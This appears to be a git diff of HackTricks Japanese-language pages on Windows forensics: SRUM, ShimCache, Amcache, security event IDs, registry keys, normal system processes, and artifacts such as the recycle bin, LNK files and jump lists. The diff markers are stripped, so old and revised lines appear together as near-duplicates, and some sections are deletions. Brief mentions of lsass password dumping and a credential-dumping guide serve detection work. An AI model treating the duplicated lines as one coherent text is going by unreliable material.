.\srum_dump.exe -i C:\Users\student\Desktop\SRUDB.dat -t SRUM_TEMPLATE.xlsx -o C:\Users\student\Desktop\srum
```
### AppCompatCache (ShimCache)
**AppCompatCache**、別名 **ShimCache** は、**Microsoft** によって開発された **Application Compatibility Database** の一部であり、アプリケーションの互換性の問題に対処します。このシステムコンポーネントは、以下のファイルメタデータのさまざまな情報を記録します。
- ファイルのフルパス
- ファイルのサイズ
- **$Standard_Information** (SI) の最終変更時間
- ShimCache の最終更新時間
- プロセス実行フラグ
このデータは、オペレーティングシステムのバージョンに基づいて特定の場所にレジストリ内に保存されます。
- XPの場合、データは `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache` に保存され、96エントリの容量があります。
- Server 2003 および Windows バージョン 2008、2012、2016、7、8、10 の場合、ストレージパスは `SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache` であり、それぞれ512および1024エントリを収容します。
保存された情報を解析するには、[**AppCompatCacheParser** tool](https://github.com/EricZimmerman/AppCompatCacheParser) の使用が推奨されます。
![](<../../../images/image (488).png>)
### Amcache
**Amcache.hve** ファイルは、システム上で実行されたアプリケーションの詳細を記録するレジストリハイブです。通常、`C:\Windows\AppCompat\Programas\Amcache.hve` にあります。
このファイルは、実行されたプロセスの記録を保存することで注目されており、実行可能ファイルへのパスやその SHA1 ハッシュを含みます。この情報は、システム上のアプリケーションの活動を追跡するために非常に貴重です。
**Amcache.hve** からデータを抽出して分析するには、[**AmcacheParser**](https://github.com/EricZimmerman/AmcacheParser) ツールを使用できます。以下のコマンドは、AmcacheParser を使用して **Amcache.hve** ファイルの内容を解析し、結果を CSV 形式で出力する方法の例です。
```bash
AmcacheParser.exe -f C:\Users\genericUser\Desktop\Amcache.hve --csv C:\Users\genericUser\Desktop\outputFolder
```
生成されたCSVファイルの中で、`Amcache_Unassociated file entries`は、未関連ファイルエントリに関する豊富な情報を提供するため、特に注目に値します。
最も興味深いCVSファイルは、`Amcache_Unassociated file entries`です。
### RecentFileCache
このアーティファクトは、W7の`C:\Windows\AppCompat\Programs\RecentFileCache.bcf`にのみ存在し、いくつかのバイナリの最近の実行に関する情報を含んでいます。
ファイルを解析するには、ツール[**RecentFileCacheParse**](https://github.com/EricZimmerman/RecentFileCacheParser)を使用できます。
### スケジュールされたタスク
これらは`C:\Windows\Tasks`または`C:\Windows\System32\Tasks`から抽出でき、XMLとして読み取ることができます。
### サービス
これらはレジストリの`SYSTEM\ControlSet001\Services`に見つけることができます。何が実行されるか、いつ実行されるかを見ることができます。
### **Windows Store**
インストールされたアプリケーションは`\ProgramData\Microsoft\Windows\AppRepository\`に見つけることができます。このリポジトリには、データベース**`StateRepository-Machine.srd`**内に**システムにインストールされた各アプリケーション**の**ログ**があります。
このデータベースのアプリケーションテーブル内には、「Application ID」、「PackageNumber」、「Display Name」という列があり、これらの列には、プレインストールされたアプリケーションとインストールされたアプリケーションに関する情報が含まれており、インストールされたアプリケーションのIDは連続しているため、いくつかのアプリケーションがアンインストールされたかどうかを確認できます。
インストールされたアプリケーションは、レジストリパス`Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\`内でも見つけることができます。また、アンインストールされたアプリケーションは、`Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Deleted\`にあります。
## Windowsイベント
Windowsイベント内に表示される情報は次のとおりです
- 何が起こったか
- タイムスタンプUTC + 0
- 関与したユーザー
- 関与したホストホスト名、IP
- アクセスされた資産(ファイル、フォルダー、プリンター、サービス)
ログは、Windows Vista以前では`C:\Windows\System32\config`にあり、Windows Vista以降では`C:\Windows\System32\winevt\Logs`にあります。Windows Vista以前はイベントログはバイナリ形式であり、以降は**XML形式**で**.evtx**拡張子を使用しています。
イベントファイルの場所は、SYSTEMレジストリの**`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Application|System|Security}`**で見つけることができます。
これらはWindowsイベントビューア**`eventvwr.msc`**)または[**Event Log Explorer**](https://eventlogxp.com) **または** [**Evtx Explorer/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)**を使用して視覚化できます。
## Windowsセキュリティイベントログの理解
アクセスイベントは、`C:\Windows\System32\winevt\Security.evtx`にあるセキュリティ構成ファイルに記録されます。このファイルのサイズは調整可能で、容量に達すると古いイベントが上書きされます。記録されたイベントには、ユーザーログインとログオフ、ユーザーアクション、セキュリティ設定の変更、ファイル、フォルダー、および共有資産へのアクセスが含まれます。
### ユーザー認証のための主要なイベントID
- **EventID 4624**:ユーザーが正常に認証されたことを示します。
- **EventID 4625**:認証の失敗を示します。
- **EventIDs 4634/4647**:ユーザーログオフイベントを表します。
- **EventID 4672**:管理者権限でのログインを示します。
#### EventID 4634/4647内のサブタイプ
- **インタラクティブ (2)**:直接ユーザーログイン。
- **ネットワーク (3)**:共有フォルダーへのアクセス。
- **バッチ (4)**:バッチプロセスの実行。
- **サービス (5)**:サービスの起動。
- **プロキシ (6)**:プロキシ認証。
- **ロック解除 (7)**:パスワードで画面がロック解除されました。
- **ネットワーククリアテキスト (8)**クリアテキストパスワードの送信、通常はIISから。
- **新しい資格情報 (9)**:アクセスのために異なる資格情報を使用。
- **リモートインタラクティブ (10)**:リモートデスクトップまたはターミナルサービスのログイン。
- **キャッシュインタラクティブ (11)**:ドメインコントローラーに連絡せずにキャッシュされた資格情報でログイン。
- **キャッシュリモートインタラクティブ (12)**:キャッシュされた資格情報でのリモートログイン。
- **キャッシュロック解除 (13)**:キャッシュされた資格情報でのロック解除。
#### EventID 4625のステータスおよびサブステータスコード
- **0xC0000064**:ユーザー名が存在しない - ユーザー名列挙攻撃を示す可能性があります。
- **0xC000006A**:正しいユーザー名だがパスワードが間違っている - パスワード推測またはブルートフォース攻撃の可能性。
- **0xC0000234**:ユーザーアカウントがロックアウトされている - 複数の失敗したログインの結果としてブルートフォース攻撃が続く可能性があります。
- **0xC0000072**:アカウントが無効 - 無効なアカウントへの不正アクセスの試み。
- **0xC000006F**:許可された時間外のログオン - 設定されたログイン時間外のアクセスの試みを示し、不正アクセスの可能性があります。
- **0xC0000070**:ワークステーション制限の違反 - 不正な場所からのログインの試みの可能性があります。
- **0xC0000193**:アカウントの有効期限切れ - 有効期限切れのユーザーアカウントへのアクセスの試み。
- **0xC0000071**:パスワードの有効期限切れ - 古いパスワードでのログインの試み。
- **0xC0000133**:時間同期の問題 - クライアントとサーバー間の大きな時間の不一致は、パス・ザ・チケットのようなより高度な攻撃を示す可能性があります。
- **0xC0000224**:必須のパスワード変更が必要 - 頻繁な必須変更は、アカウントセキュリティを不安定にしようとする試みを示唆するかもしれません。
- **0xC0000225**:セキュリティの問題ではなく、システムバグを示します。
- **0xC000015b**:拒否されたログオンタイプ - サービスログオンを実行しようとするユーザーなど、不正なログオンタイプでのアクセスの試み。
#### EventID 4616
- **時間変更**:システム時間の変更、イベントのタイムラインを隠す可能性があります。
#### EventID 6005および6006
- **システムの起動とシャットダウン**EventID 6005はシステムの起動を示し、EventID 6006はシャットダウンを示します。
#### EventID 1102
- **ログ削除**:セキュリティログがクリアされることは、違法行為を隠蔽するための赤信号です。
#### USBデバイストラッキングのためのイベントID
- **20001 / 20003 / 10000**USBデバイスの最初の接続。
- **10100**USBドライバーの更新。
- **EventID 112**USBデバイス挿入の時間。
これらのログインタイプや資格情報ダンプの機会をシミュレートする実用的な例については、[Altered Securityの詳細ガイド](https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-find-credentials-in-them)を参照してください。
イベントの詳細、ステータスおよびサブステータスコードは、特にEvent ID 4625でのイベントの原因に関するさらなる洞察を提供します。
### Windowsイベントの回復
削除されたWindowsイベントを回復する可能性を高めるために、疑わしいコンピュータの電源を直接抜いてシャットダウンすることをお勧めします。**Bulk_extractor**は、`.evtx`拡張子を指定する回復ツールで、これらのイベントを回復しようとする際に推奨されます。
### Windowsイベントを通じて一般的な攻撃を特定する
一般的なサイバー攻撃を特定するためにWindowsイベントIDを利用する包括的なガイドについては、[Red Team Recipe](https://redteamrecipe.com/event-codes/)を訪れてください。
#### ブルートフォース攻撃
複数のEventID 4625レコードによって識別され、攻撃が成功した場合はEventID 4624が続きます。
#### 時間変更
EventID 4616によって記録され、システム時間の変更は法医学的分析を複雑にする可能性があります。
#### USBデバイストラッキング
USBデバイストラッキングに役立つシステムイベントIDには、初回使用のための20001/20003/10000、ドライバー更新のための10100、挿入タイムスタンプのためのEventID 112が含まれます。
#### システム電源イベント
EventID 6005はシステムの起動を示し、EventID 6006はシャットダウンを示します。
#### ログ削除
セキュリティEventID 1102はログの削除を示し、法医学的分析にとって重要なイベントです。
{{#include ../../../banners/hacktricks-training.md}}

101
src/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md
View File

@ -1,101 +0,0 @@
# 興味深いWindowsレジストリキー
### 興味深いWindowsレジストリキー
{{#include ../../../banners/hacktricks-training.md}}
### **Windowsバージョンと所有者情報**
- **`Software\Microsoft\Windows NT\CurrentVersion`**に位置し、Windowsのバージョン、サービスパック、インストール時間、登録された所有者の名前が簡潔に表示されます。
### **コンピュータ名**
- ホスト名は**`System\ControlSet001\Control\ComputerName\ComputerName`**の下にあります。
### **タイムゾーン設定**
- システムのタイムゾーンは**`System\ControlSet001\Control\TimeZoneInformation`**に保存されています。
### **アクセス時間の追跡**
- デフォルトでは、最終アクセス時間の追跡はオフになっています(**`NtfsDisableLastAccessUpdate=1`**)。これを有効にするには、次のコマンドを使用します:
`fsutil behavior set disablelastaccess 0`
### Windowsバージョンとサービスパック
- **Windowsバージョン**はエディションHome、ProとそのリリースWindows 10、Windows 11を示し、**サービスパック**は修正や時には新機能を含む更新です。
### 最終アクセス時間の有効化
- 最終アクセス時間の追跡を有効にすると、ファイルが最後に開かれた時刻を確認でき、法医学的分析やシステム監視にとって重要です。
### ネットワーク情報の詳細
- レジストリには、**ネットワークの種類無線、ケーブル、3G**や**ネットワークカテゴリ(パブリック、プライベート/ホーム、ドメイン/ワーク)**を含む、ネットワーク構成に関する広範なデータが保持されており、ネットワークセキュリティ設定や権限を理解するために重要です。
### クライアントサイドキャッシングCSC
- **CSC**は、共有ファイルのコピーをキャッシュすることでオフラインファイルアクセスを向上させます。異なる**CSCFlags**設定は、どのファイルがどのようにキャッシュされるかを制御し、特に接続が不安定な環境でのパフォーマンスやユーザー体験に影響を与えます。
### 自動起動プログラム
- 様々な`Run`および`RunOnce`レジストリキーにリストされているプログラムは、起動時に自動的に起動され、システムのブート時間に影響を与え、マルウェアや不要なソフトウェアを特定するための興味のあるポイントとなる可能性があります。
### シェルバッグ
- **シェルバッグ**はフォルダビューの設定を保存するだけでなく、フォルダが存在しなくてもフォルダアクセスの法医学的証拠を提供します。これは、他の手段では明らかでないユーザー活動を明らかにするため、調査にとって非常に貴重です。
### USB情報と法医学
- レジストリに保存されたUSBデバイスに関する詳細は、どのデバイスがコンピュータに接続されていたかを追跡するのに役立ち、デバイスを機密ファイル転送や不正アクセスのインシデントに関連付ける可能性があります。
### ボリュームシリアル番号
- **ボリュームシリアル番号**は、ファイルシステムの特定のインスタンスを追跡するのに重要であり、異なるデバイス間でファイルの起源を確立する必要がある法医学的シナリオで役立ちます。
### **シャットダウンの詳細**
- シャットダウン時間とカウント後者はXPのみは、**`System\ControlSet001\Control\Windows`**および**`System\ControlSet001\Control\Watchdog\Display`**に保持されています。
### **ネットワーク構成**
- 詳細なネットワークインターフェース情報については、**`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`**を参照してください。
- 最初と最後のネットワーク接続時間VPN接続を含むは、**`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`**のさまざまなパスに記録されています。
### **共有フォルダ**
- 共有フォルダと設定は**`System\ControlSet001\Services\lanmanserver\Shares`**の下にあります。クライアントサイドキャッシングCSC設定はオフラインファイルの可用性を決定します。
### **自動的に起動するプログラム**
- **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`**のようなパスや、`Software\Microsoft\Windows\CurrentVersion`の下の類似のエントリは、起動時に実行されるプログラムを詳細に示しています。
### **検索と入力されたパス**
- エクスプローラーの検索と入力されたパスは、**`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`**の下でWordwheelQueryおよびTypedPathsとして追跡されます。
### **最近の文書とOfficeファイル**
- 最近アクセスされた文書とOfficeファイルは、`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs`および特定のOfficeバージョンのパスに記録されています。
### **最も最近使用されたMRUアイテム**
- 最近のファイルパスやコマンドを示すMRUリストは、`NTUSER.DAT`のさまざまな`ComDlg32`および`Explorer`サブキーに保存されています。
### **ユーザー活動の追跡**
- ユーザーアシスト機能は、実行回数や最終実行時間を含む詳細なアプリケーション使用統計を**`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`**に記録します。
### **シェルバッグ分析**
- フォルダアクセスの詳細を明らかにするシェルバッグは、`USRCLASS.DAT`および`NTUSER.DAT`の下の`Software\Microsoft\Windows\Shell`に保存されています。分析には**[Shellbag Explorer](https://ericzimmerman.github.io/#!index.md)**を使用してください。
### **USBデバイスの履歴**
- **`HKLM\SYSTEM\ControlSet001\Enum\USBSTOR`**および**`HKLM\SYSTEM\ControlSet001\Enum\USB`**には、接続されたUSBデバイスに関する豊富な詳細が含まれており、製造元、製品名、接続タイムスタンプが含まれます。
- 特定のUSBデバイスに関連付けられたユーザーは、デバイスの**{GUID}**を検索することで特定できます。
- 最後にマウントされたデバイスとそのボリュームシリアル番号は、それぞれ`System\MountedDevices`および`Software\Microsoft\Windows NT\CurrentVersion\EMDMgmt`を通じて追跡できます。
このガイドは、Windowsシステム上の詳細なシステム、ネットワーク、およびユーザー活動情報にアクセスするための重要なパスと方法を要約し、明確さと使いやすさを目指しています。
{{#include ../../../banners/hacktricks-training.md}}

106
src/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md
View File

@ -1,106 +0,0 @@
{{#include ../../../banners/hacktricks-training.md}}
## smss.exe
**セッションマネージャ**。\
セッション0は**csrss.exe**と**wininit.exe****OS** **サービス**を開始し、セッション1は**csrss.exe**と**winlogon.exe****ユーザー** **セッション**)を開始します。しかし、プロセスツリーには**子プロセスなしでその** **バイナリ**の**プロセスが1つだけ**表示されるはずです。
また、セッション0と1以外のセッションは、RDPセッションが発生している可能性を示します。
## csrss.exe
**クライアント/サーバー実行サブシステムプロセス**。\
**プロセス**と**スレッド**を管理し、他のプロセスに**Windows** **API**を提供し、**ドライブレター**をマッピングし、**一時ファイル**を作成し、**シャットダウン** **プロセス**を処理します。
**セッション0に1つ、セッション1にもう1つ**(プロセスツリーに**2つのプロセス**)。新しいセッションごとに**もう1つ**が作成されます。
## winlogon.exe
**Windowsログオンプロセス**。\
ユーザーの**ログオン**/**ログオフ**を担当します。**logonui.exe**を起動してユーザー名とパスワードを要求し、その後**lsass.exe**を呼び出してそれらを検証します。
次に、**`HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`**の**Userinit**キーで指定された**userinit.exe**を起動します。
さらに、前のレジストリには**Shellキー**に**explorer.exe**が含まれている必要があり、そうでない場合は**マルウェアの持続性手法**として悪用される可能性があります。
## wininit.exe
**Windows初期化プロセス**。\
セッション0で**services.exe**、**lsass.exe**、および**lsm.exe**を起動します。プロセスは1つだけであるべきです。
## userinit.exe
**Userinitログオンアプリケーション**。\
**HKCU**の**ntduser.dat**を読み込み、**ユーザー** **環境**を初期化し、**ログオン** **スクリプト**と**GPO**を実行します。
**explorer.exe**を起動します。
## lsm.exe
**ローカルセッションマネージャ**。\
**smss.exe**と連携してユーザーセッションを操作します:ログオン/ログオフ、シェルの開始、デスクトップのロック/ロック解除など。
W7以降、lsm.exeはサービスlsm.dllに変わりました。
W7ではプロセスは1つだけであり、その中にDLLを実行するサービスがあります。
## services.exe
**サービスコントロールマネージャ**。\
**自動起動**として構成された**サービス**と**ドライバ**を**読み込みます**。
これは**svchost.exe**、**dllhost.exe**、**taskhost.exe**、**spoolsv.exe**などの親プロセスです。
サービスは`HKLM\SYSTEM\CurrentControlSet\Services`で定義されており、このプロセスはsc.exeによってクエリ可能なサービス情報のDBをメモリ内に保持します。
**いくつかの** **サービス**が**独自のプロセスで実行され**、他のサービスが**svchost.exeプロセスを共有する**ことに注意してください。
プロセスは1つだけであるべきです。
## lsass.exe
**ローカルセキュリティ権限サブシステム**。\
ユーザーの**認証**を担当し、**セキュリティ** **トークン**を作成します。`HKLM\System\CurrentControlSet\Control\Lsa`にある認証パッケージを使用します。
**セキュリティ** **イベント** **ログ**に書き込み、プロセスは1つだけであるべきです。
このプロセスはパスワードをダンプするために高度に攻撃されることを考慮してください。
## svchost.exe
**汎用サービスホストプロセス**。\
複数のDLLサービスを1つの共有プロセスでホストします。
通常、**svchost.exe**は`-k`フラグで起動されます。これにより、レジストリ**HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost**にクエリが送信され、-kで言及された引数を持つキーがあり、同じプロセスで起動するサービスが含まれます。
例えば:`-k UnistackSvcGroup`は次のサービスを起動します:`PimIndexMaintenanceSvc MessagingService WpnUserService CDPUserSvc UnistoreSvc UserDataSvc OneSyncSvc`
**フラグ`-s`**も引数と共に使用される場合、svchostはこの引数で指定された**サービスのみを起動する**ように要求されます。
`svchost.exe`のプロセスは複数存在します。いずれかが**`-k`フラグを使用していない**場合、それは非常に疑わしいです。**services.exeが親でない**場合も非常に疑わしいです。
## taskhost.exe
このプロセスはDLLから実行されるプロセスのホストとして機能します。また、DLLから実行されるサービスを読み込みます。
W8ではtaskhostex.exeと呼ばれ、W10ではtaskhostw.exeと呼ばれます。
## explorer.exe
これは**ユーザーのデスクトップ**を担当し、ファイル拡張子を介してファイルを起動するプロセスです。
**ログオンしているユーザーごとに** **1つだけ**のプロセスが生成されるべきです。
これは**userinit.exe**から実行され、終了する必要があるため、このプロセスの**親**は表示されるべきではありません。
# 悪意のあるプロセスを捕まえる
- 期待されるパスから実行されていますかWindowsバイナリは一時場所から実行されません
- 奇妙なIPと通信していますか
- デジタル署名を確認してくださいMicrosoftのアーティファクトは署名されているべきです
- 正しく綴られていますか?
- 期待されるSIDの下で実行されていますか
- 親プロセスは期待されるものでしょうか(あれば)?
- 子プロセスは期待されるものでしょうかcmd.exe、wscript.exe、powershell.exeなどはありませんか
{{#include ../../../banners/hacktricks-training.md}}

208
src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md
View File

@ -1,40 +1,38 @@
# Windows アーティファクト
## Windows アーティファクト
# Windows Artifacts
{{#include ../../../banners/hacktricks-training.md}}
## 一般的な Windows アーティファクト
## Generic Windows Artifacts
### Windows 10 通知
### Windows 10 Notifications
パス `\Users\<username>\AppData\Local\Microsoft\Windows\Notifications` には、データベース `appdb.dat`Windows アニバーサリー前)または `wpndatabase.db`Windows アニバーサリー後)があります。
この SQLite データベース内には、興味深いデータを含む可能性のあるすべての通知XML 形式)の `Notification` テーブルがあります。
### タイムライン
### Timeline
タイムラインは、訪問したウェブページ、編集した文書、実行したアプリケーションの **時系列履歴** を提供する Windows の特徴です。
Timeline は、訪問したウェブページ、編集した文書、実行したアプリケーションの **時系列履歴** を提供する Windows の特徴です。
データベースは、パス `\Users\<username>\AppData\Local\ConnectedDevicesPlatform\<id>\ActivitiesCache.db` にあります。このデータベースは SQLite ツールまたはツール [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) **を使用して開くことができ、2 つのファイルが生成され、ツール** [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md) **で開くことができます**
データベースは、パス `\Users\<username>\AppData\Local\ConnectedDevicesPlatform\<id>\ActivitiesCache.db` にあります。このデータベースはSQLite ツールまたはツール [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) を使用して開くことができ、**このツールで生成された 2 つのファイルは、ツール** [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md) **で開くことができます**
### ADS (代替データストリーム)
### ADS (Alternate Data Streams)
ダウンロードされたファイルには、**ADS Zone.Identifier** が含まれており、**どのように** インターネット、イントラネットなどから **ダウンロードされたか** を示しています。一部のソフトウェア(ブラウザなど)は、ファイルがダウンロードされた**URL**など、さらに**多くの** **情報**を提供することがよくあります。
ダウンロードされたファイルには、**ADS Zone.Identifier** が含まれており、**どのように** intranet、internet などから **ダウンロードされたか** を示しています。一部のソフトウェア(ブラウザなど)は、ファイルがダウンロードされた **URL** など、さらに **多くの情報** を提供することがよくあります。
## **ファイルバックアップ**
## **File Backups**
### ごみ箱
### Recycle Bin
Vista/Win7/Win8/Win10 では、**ごみ箱**はドライブのルートにあるフォルダー **`$Recycle.bin`** にあります(`C:\$Recycle.bin`)。\
このフォルダーでファイルが削除されると、2 つの特定のファイルが作成されます:
Vista/Win7/Win8/Win10 では、**Recycle Bin** はドライブのルートにあるフォルダー **`$Recycle.bin`** にあります(`C:\$Recycle.bin`)。\
このフォルダーでファイルが削除されると、2 つの特定のファイルが作成されます:
- `$I{id}`: ファイル情報(削除された日時)
- `$R{id}`: ファイルの内容
![](<../../../images/image (1029).png>)
これらのファイルがあれば、ツール [**Rifiuti**](https://github.com/abelcheung/rifiuti2) を使用して削除されたファイルの元のアドレスと削除された日時を取得できますVista Win10 には `rifiuti-vista.exe` を使用)。
これらのファイルがあれば、ツール [**Rifiuti**](https://github.com/abelcheung/rifiuti2) を使用して削除されたファイルの元のアドレスと削除された日時を取得できますVista Win10 には `rifiuti-vista.exe` を使用)。
```
.\rifiuti-vista.exe C:\Users\student\Desktop\Recycle
```
@ -42,13 +40,13 @@ Vista/Win7/Win8/Win10 では、**ごみ箱**はドライブのルートにある
### ボリュームシャドウコピー
シャドウコピーは、使用中のコンピュータファイルやボリュームの**バックアップコピー**やスナップショットを作成できるMicrosoft Windowsに含まれる技術です。
シャドウコピーは、Microsoft Windowsに含まれる技術で、コンピュータファイルやボリュームの**バックアップコピー**やスナップショットを作成できます。これらは使用中であっても可能です。
これらのバックアップは通常、ファイルシステムのルートから`\System Volume Information`にあり、名前は以下の画像に示されている**UID**で構成されています。
これらのバックアップは通常、ファイルシステムのルートから` \System Volume Information`にあり、名前は以下の画像に示されている**UID**で構成されています。
![](<../../../images/image (94).png>)
**ArsenalImageMounter**を使用してフォレンジックイメージをマウントすると、ツール[**ShadowCopyView**](https://www.nirsoft.net/utils/shadow_copy_view.html)を使用してシャドウコピーを検査し、シャドウコピーのバックアップから**ファイルを抽出**することできます。
**ArsenalImageMounter**を使用してフォレンジックイメージをマウントすると、ツール[**ShadowCopyView**](https://www.nirsoft.net/utils/shadow_copy_view.html)を使用してシャドウコピーを検査し、シャドウコピーのバックアップから**ファイルを抽出**することできます。
![](<../../../images/image (576).png>)
@ -68,14 +66,14 @@ Officeの自動保存ファイルは次の場所にあります: `C:\Usuarios\\A
### 最近の文書 (LNK)
Windowsは、ユーザーが次の場所で**ファイルを開いたり、使用したり、作成したり**すると、これらの**ショートカット**を**自動的に****作成**します:
Windowsは、ユーザーが次の場所で**ファイルを開く、使用する、または作成する**と、これらの**ショートカット**を**自動的に****作成**します:
- Win7-Win10: `C:\Users\\AppData\Roaming\Microsoft\Windows\Recent\`
- Office: `C:\Users\\AppData\Roaming\Microsoft\Office\Recent\`
フォルダーが作成されると、フォルダーへのリンク、親フォルダーへのリンク、および祖父フォルダーへのリンクも作成されます。
フォルダーが作成されると、フォルダーへのリンク、親フォルダー、および祖父フォルダーへのリンクも作成されます。
これらの自動的に作成されたリンクファイルは、**ファイル**か**フォルダー**か、**MAC** **タイム**ファイルが保存されている**ボリューム情報**、および**ターゲットファイルのフォルダー**など、**起源に関する情報**を**含んでいます**。この情報は、ファイルが削除された場合にそれらを回復するのに役立ちます。
これらの自動的に作成されたリンクファイルは、**ファイル**か**フォルダー**か、**MAC** **タイム**、**ボリューム情報**、および**ターゲットファイルのフォルダー**に関する情報を**含んでいます**。この情報は、ファイルが削除された場合にそれらを回復するのに役立ちます。
また、リンクファイルの**作成日**は、元のファイルが**最初に**使用された**時間**であり、リンクファイルの**最終更新日**は、元のファイルが使用された**最後の時間**です。
@ -90,7 +88,7 @@ Windowsは、ユーザーが次の場所で**ファイルを開いたり、使
- **2番目のセット:**
1. LinkModifiedDate
2. LinkAccessDate
3. LinkCreationDate.
3. LinkCreationDate
最初のセットのタイムスタンプは**ファイル自体のタイムスタンプ**を参照します。2番目のセットは**リンクされたファイルのタイムスタンプ**を参照します。
@ -102,15 +100,15 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs
### ジャンプリスト
これらはアプリケーションごとに示される最近のファイルです。各アプリケーションでアクセスできる**アプリケーションによって使用された最近のファイルのリスト**です。これらは**自動的に作成されるか、カスタムで作成される**ことがあります。
これらはアプリケーションごとに示される最近のファイルです。各アプリケーションでアクセスできる**アプリケーションによって使用された最近のファイルのリスト**です。これらは**自動的に作成されるか、カスタム**で作成されることがあります。
自動的に作成された**ジャンプリスト**は`C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\`に保存されます。ジャンプリストは`{id}.autmaticDestinations-ms`という形式で名付けられ、最初のIDはアプリケーションのIDです。
自動的に作成された**ジャンプリスト**は`C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\`に保存されます。ジャンプリストは、最初のIDがアプリケーションのIDである`{id}.autmaticDestinations-ms`という形式で命名されます。
カスタムジャンプリストは`C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\`に保存され、通常はファイルに**重要な**ことが起こったためにアプリケーションによって作成されます(お気に入りとしてマークされたかもしれません)。
カスタムジャンプリストは`C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\`に保存され、通常はファイルに**重要な**ことが起こったためにアプリケーションによって作成されます(お気に入りとしてマークされたかもしれません)。
任意のジャンプリストの**作成時間**は**ファイルが最初にアクセスされた時間**を示し、**修正時間は最後にアクセスされた時間**を示します。
任意のジャンプリストの**作成時間**は**ファイルが最初にアクセスされた時間**を示し、**修正時間は最後にアクセスされた時間**を示します。
ジャンプリストは[**JumplistExplorer**](https://ericzimmerman.github.io/#!index.md)を使用して査できます。
ジャンプリストは[**JumplistExplorer**](https://ericzimmerman.github.io/#!index.md)を使用して調査できます。
![](<../../../images/image (168).png>)
@ -140,9 +138,9 @@ WPDNSEフォルダー内のファイルは元のファイルのコピーであ
### setupapi
USB接続が行われた時刻に関するタイムスタンプを取得するには、ファイル`C:\Windows\inf\setupapi.dev.log`を確認してください(`Section start`を検索)。
USB接続が行われた時刻に関するタイムスタンプを取得するには、`C:\Windows\inf\setupapi.dev.log`ファイルを確認してください(`Section start`を検索)。
![](<../../../images/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (14) (2).png>)
![](<../../../images/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (14) (2).png>)
### USB Detective
@ -152,7 +150,7 @@ USB接続が行われた時刻に関するタイムスタンプを取得する
### プラグアンドプレイのクリーンアップ
「プラグアンドプレイのクリーンアップ」として知られるスケジュールされたタスクは、主に古いドライバーバージョンの削除を目的としています。最新のドライバーパッケージバージョンを保持するという指定された目的とは対照的に、オンラインソースは、30日間非アクティブなドライバーも対象にしていることを示唆しています。したがって、過去30日間接続されていないリムーバブルデバイスのドライバーは削除される可能性があります。
「プラグアンドプレイのクリーンアップ」として知られるスケジュールされたタスクは、主に古いドライバーバージョンの削除を目的としています。最新のドライバーパッケージバージョンを保持するという指定された目的に反して、オンラインソースは、過去30日間非アクティブなドライバーも対象にしていることを示唆しています。したがって、過去30日間接続されていないリムーバブルデバイスのドライバーは削除される可能性があります。
タスクは次のパスにあります:`C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Plug and Play Cleanup`
@ -164,7 +162,7 @@ USB接続が行われた時刻に関するタイムスタンプを取得する
- **UseUnifiedSchedulingEngine**`TRUE`に設定されており、一般的なタスクスケジューリングエンジンの使用を示します。
- **MaintenanceSettings**
- **Period ('P1M')**:タスクスケジューラに、定期的な自動メンテナンス中に毎月クリーンアップタスクを開始するよう指示します。
- **Deadline ('P2M')**タスクスケジューラに、タスクが2か月連続して失敗した場合、緊急自動メンテナンス中にタスクを実行するよう指示します。
- **Deadline ('P2M')**タスクスケジューラに、タスクが2か月連続失敗した場合、緊急自動メンテナンス中にタスクを実行するよう指示します。
この構成により、ドライバーの定期的なメンテナンスとクリーンアップが確保され、連続して失敗した場合のタスクの再試行のための規定が設けられています。
@ -187,7 +185,7 @@ USB接続が行われた時刻に関するタイムスタンプを取得する
メールの**メタデータ**と**連絡先**は、**EDBデータベース**内にあります:`\Users\<username>\AppData\Local\Comms\UnistoreDB\store.vol`
ファイルの拡張子を`.vol`から`.edb`に変更すると、ツール[**ESEDatabaseView**](https://www.nirsoft.net/utils/ese_database_view.html)を使用して開くことができます。`Message`テーブル内でメールを見ることができます。
ファイルの拡張子を`.vol`から`.edb`に変更すると、[ESEDatabaseView](https://www.nirsoft.net/utils/ese_database_view.html)ツールを使用して開くことができます。`Message`テーブル内でメールを見ることができます。
### Microsoft Outlook
@ -203,19 +201,19 @@ Microsoft Outlookクライアントでは、送信/受信されたすべての
